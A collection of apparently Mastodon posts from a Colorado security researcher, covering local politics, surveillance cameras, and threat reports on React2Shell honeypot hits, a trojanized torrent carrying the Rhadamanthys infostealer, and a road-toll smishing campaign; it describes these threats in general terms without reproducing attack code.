Apparently it doesn't matter whether you have long-term Windows updates through October with extended updates, if you use Windows 10, #Slack is going to just cut off your ability to use the dedicated app on May 18.

Have to say, this sucks, but I guess they will let you use the browser -- for now.

It has been a busy winter so far for me, which is why I haven't been posting a lot here. But today I'm proud to share with you the fruits of some of that labor: The Colorado Democratic Party's platform for 2026. For those unfamiliar, a platform (in the US) is a statement of values that a political party stands for, generally agreed upon by people who stand for election as representatives of the party.

I was elected during last year's party re-org to the Platform Committee. The chair of the committee asked if I would run the subcommittees for two of the "planks" (sections) of the platform: the Democracy section, and the New Tech & AI section. It was an honor to work on both.

I'm going to share screenshots from the New Tech & AI plank because it's relevant to the work I do here, and I think a lot of people might be interested to see this statement of values. This plank is brand new, never before covered in prior Platform documents.

I'm also pleased to report that the whole of the Platform Committee and the roughly 1500 delegates to last weekend's statewide party Assembly voted to approve this as-is, with no additional changes, on a vote of 98.9% in favor.

There's a lot to like, but my favorite aspect of this is that I managed to get widespread approval for use of the term #enshittification in the official platform, both from the Platform committee and the larger party leadership. Thanks @pluralistic for the inspiration. (I believe this is the first time the term has been used in any official political party platform ever.)

The full platform is readable at https://www.coloradodems.org/platform

#AI #datasovereignty #privacy #infosec #techequity #R2R #RightToRepair #politics #COpolitics #Boulder #Colorado #Democracy #democrats

I had a chance last week to chat with Benjamin Read of #Wiz. Last month, Read and other members of his team published a deep dive into the #React2Shell
(CVE-2025-55182) vulnerability, and I was curious to see what has been hitting my honeypot, so I took a closer look.

This is doing some weird stuff, friends.

As is normally the case with exploits targeting internet-facing devices, once the exploit becomes known, it ends up in the automated scanners used by threat actors and security researchers. What I've seen over the past week is a combination of both.

In just a few hours of operation, I identified a small number of source IP addresses exploiting React2Shell by pointing the vulnerable system at URLs hosting BASH scripts. These scripts are really familiar to anyone who routinely looks at honeypot data - they contain a series of commands that pull down and execute malicious payloads.

And as I've seen in the past, some of these payloads use racially inflammatory language in their malware. It's weird and gross, but unfortunately, really common.

But while most of these payloads were "the usual suspects" - remote shells, cryptocurrency miners - there was one payload that stuck out.

It's an exploit file, based on this proof-of-concept [https://github.com/iotwar/FIVEM-POC/blob/main/fivem-poc.py] designed to DDoS a modded server running "FiveM," a popular version of the game Grand Theft Auto V.

Let that one sink in: among the earliest adopters of a brand new exploit are...people trying to mess with other people's online game servers.

I've long said that exploits like these are the canaries in the datacenter coal mine. After all, if an attacker can force your server to run a cryptominer (or a game DDoS tool), they can force it to run far more malicious code.

I guess someone, or a group of someones, just want to ruin everyone's good time, no matter how or what form that takes. And they'll do it in the most offensive way possible.

Anyway, patch your servers, please, if only to stick it to these people who want to be the reason we can't have nice things.

#PoC #exploit #CVE_2025_55182 #DDoS #FiveM #REACT #Bash #cryptominer #malware

Big windstorm in #Boulder today. Lost power about an hour ago. Good reminder that we already have candles ready to go. Happy Hannukah, all.

#COWx

A remarkable outcome for a large group of local Colorado activists last night. In Longmont, a Denver suburb northeast of Boulder, more than 50 people testified last night to city council (and more than 90 people came to the council meeting) about their pending renewal of a contract with Flock, the ALPR company that has been under fire for its surveillance capitalism. DeFlock Longmont, the group that organized the public comment scrum, won a victory when city council voted not to renew the contract at the end of the hours-long meeting.

Public comment was at times serious and other times silly, but unanimous in opposition to the city renewing their contract. Public safety officials, including the chief of Longmont Police, testified after the public comment period that the Flock cameras had been instrumental in stopping a number of dangerous incidents and arresting people who committed violent crimes.

I hope you're following this, @404mediaco because we are not going to stop with just this one city.

Read the story here:

https://yellowscene.com/2025/12/10/longmont-residents-win-fight-against-ai-surveillance/

edit: added BRL story:

https://boulderreportinglab.org/2025/12/11/longmont-halts-flock-license-plate-reader-data-sharing-and-weighs-ending-contract-as-boulder-plans-to-renew/

Watch the video:

https://www.youtube.com/watch?v=CFj3UlteWHE

#COpolitics #Colorado #Longmont #Flock #ALPR #resistance

Oldies are still goodies: It didn't take me long to find a #trojanized pirated TV show #Torrent on a public torrent search engine.

Tell your friends: This is why it's sometimes dangerous to pirate stuff.

The torrent delivers a rar that contains a #Rhadamanthys #infostealer #malware DLL. The package also contains a benign executable that uses the familiar VLC Player traffic-cone icon. It looks like a TV show file, but it's way too small at only 970kb. Double-clicking the benign executable loads the malware DLL.

Rhadamanthys is the same malware family that Europol put out a press release about last month. Maybe it was down for a while, but it seems it's not out --yet.

The bogus torrent leverages strong interest in the streaming TV show Pluribus as its lure.

https://www.europol.europa.eu/media-press/newsroom/news/end-of-game-for-cybercrime-infrastructure-1025-servers-taken-down

https://www.virustotal.com/gui/file/a11f4f6270b44992837a3f3869397c00fc19176c673abd15edbda39e45227fd5/details

Links to a fresh set of "road toll" scam websites were pushed out by SMS today, targeting people with mobile phones in #Colorado area codes. The messages tell the recipient that they owe back tolls for driving on a highway in Colorado and purports to link to the Colorado DMV website. The page that loads accurately mimics the Colorado Department of Revenue website appearance, and claims you owe $6.69 in tolls. Needless to say, this is fake. Spread the word: Tolls are not collected directly via SMS message.

This is a continuation of an ongoing, Russia-originated campaign that has been targeting specific states and regions for the past year. I blogged about it in October for @Netcraft - we gave the threat actor the moniker Logger EIO. https://www.netcraft.com/blog/taxpayers-drivers-targeted-in-refund-and-road-toll-smishing-scams

#smishing #phishing #colorado #CODOR #CODMV #DMV #scam #fraud #roadtoll #tollroad #tollscam #LoggerEIO